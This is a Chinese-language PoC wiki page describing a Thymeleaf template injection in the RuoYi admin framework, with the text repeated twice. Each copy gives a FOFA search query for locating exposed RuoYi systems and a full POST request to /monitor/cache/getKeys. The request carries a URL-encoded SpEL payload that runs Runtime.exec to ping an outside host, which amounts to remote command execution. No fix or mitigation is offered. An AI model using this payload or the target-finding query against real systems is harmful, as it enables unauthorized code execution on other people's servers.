fofamini-wiki

登录白背景

源码

若依快速开发框架getKeys存在thymeleaf 模板注入漏洞

一、漏洞简介

ruoyi是一套基于java开发的轻量级开源快速开发框架，采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计，代码清晰简单易于维护，同时提供多种组件，如代码生成、前后端分离、数据权限管理等，可以快速开发出完整的项目。若依快速开发框架getKeys存在thymeleaf 模板注入漏洞

二、影响版本

ruoyi

三、资产测绘

app="若依-管理系统"

四、漏洞复现

POST /monitor/cache/getKeys HTTP/1.1
user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=efda665b-6990-49f4-85c2-8f65fc69a946
Host: 
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 7

cacheName=1&fragment=%28%28%24%7b%54%20%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%70%6d%70%65%6a%62%7a%64%72%66%2e%64%67%72%68%33%2e%63%6e%22%29%7d%29%29

fragment后的内容为url编码后的代码

原文: https://www.yuque.com/xiaokp7/ocvun2/zv0mx6zne9bwdppo

# 若依快速开发框架getKeys存在thymeleaf 模板注入漏洞

# 一、漏洞简介
ruoyi是一套基于java开发的轻量级开源快速开发框架，采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计，代码清晰简单易于维护，同时提供多种组件，如代码生成、前后端分离、数据权限管理等，可以快速开发出完整的项目。若依快速开发框架getKeys存在thymeleaf 模板注入漏洞

# 二、影响版本
+ ruoyi

# 三、资产测绘
```plain
app="若依-管理系统"
```

![1721639324402-8114ae2f-0e23-4dff-b4a8-c3e488a0f08f.png](./img/laWjR8nwUHw-M7Yb/1721639324402-8114ae2f-0e23-4dff-b4a8-c3e488a0f08f-690137.png)

# 四、漏洞复现
```plain
POST /monitor/cache/getKeys HTTP/1.1
user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=efda665b-6990-49f4-85c2-8f65fc69a946
Host: 
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 7

cacheName=1&fragment=%28%28%24%7b%54%20%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%70%6d%70%65%6a%62%7a%64%72%66%2e%64%67%72%68%33%2e%63%6e%22%29%7d%29%29
```

fragment后的内容为url编码后的代码

![1721667520563-e743d475-23a8-4701-95c1-fe0bbd1b2e15.png](./img/laWjR8nwUHw-M7Yb/1721667520563-e743d475-23a8-4701-95c1-fe0bbd1b2e15-389309.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zv0mx6zne9bwdppo>